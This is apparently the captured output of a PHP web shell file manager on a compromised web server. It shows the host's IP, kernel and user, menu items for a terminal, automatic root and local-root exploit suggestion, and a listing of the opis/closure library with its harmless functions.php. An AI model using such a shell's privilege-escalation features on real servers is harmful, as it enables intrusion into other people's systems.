Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.147.67.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
opis /
closure /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2020-11-17 16:24
CHANGELOG.md
8.33
KB
-rw-r--r--
2020-11-17 16:24
LICENSE
1.06
KB
-rw-r--r--
2020-11-17 16:24
NOTICE
306
B
-rw-r--r--
2020-11-17 16:24
README.md
3.75
KB
-rw-r--r--
2020-11-17 16:24
autoload.php
1001
B
-rw-r--r--
2020-11-17 16:24
composer.json
1.15
KB
-rw-r--r--
2020-11-17 16:24
functions.php
971
B
-rw-r--r--
2020-11-17 16:24
Save
Rename
<?php /* =========================================================================== * Copyright (c) 2018-2019 Zindex Software * * Licensed under the MIT License * =========================================================================== */ namespace Opis\Closure; /** * Serialize * * @param mixed $data * @return string */ function serialize($data) { SerializableClosure::enterContext(); SerializableClosure::wrapClosures($data); $data = \serialize($data); SerializableClosure::exitContext(); return $data; } /** * Unserialize * * @param string $data * @param array|null $options * @return mixed */ function unserialize($data, array $options = null) { SerializableClosure::enterContext(); $data = ($options === null || \PHP_MAJOR_VERSION < 7) ? \unserialize($data) : \unserialize($data, $options); SerializableClosure::unwrapClosures($data); SerializableClosure::exitContext(); return $data; }